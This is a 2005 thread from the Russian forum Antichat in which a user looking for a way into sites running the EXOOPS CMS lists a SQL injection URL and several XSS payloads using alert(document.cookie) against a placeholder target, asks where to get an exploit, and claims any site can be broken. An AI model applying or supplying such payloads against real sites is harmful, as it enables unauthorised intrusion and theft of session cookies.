Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   EXOOPS (https://forum.antichat.xyz/showthread.php?t=9018)

TNT 24.08.2005 14:41

EXOOPS
 
Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только:
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/ind...id=9%2c+9%2c+9

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.

WizART 27.08.2005 00:09

А че в тему о форумах пишешь? Вообще тут про форумы а не про движки Exoops говорят...

GreenBear 27.08.2005 00:18

Если игорирует, то экслойт тебя не спасет... Бага прикрыта. А так - securitylab.ru \ поиск
Цитата:

Сообщение от WizART
А че в тему о форумах пишешь? Вообще тут про форумы а не про движки Exoops говорят...

http://www.securitylab.ru/bitrix/ima...ile/offtop.gif

TNT 27.08.2005 01:27

Но бага должна быть, полюбому. Нет сайта который нельзя сломать.


Время: 03:29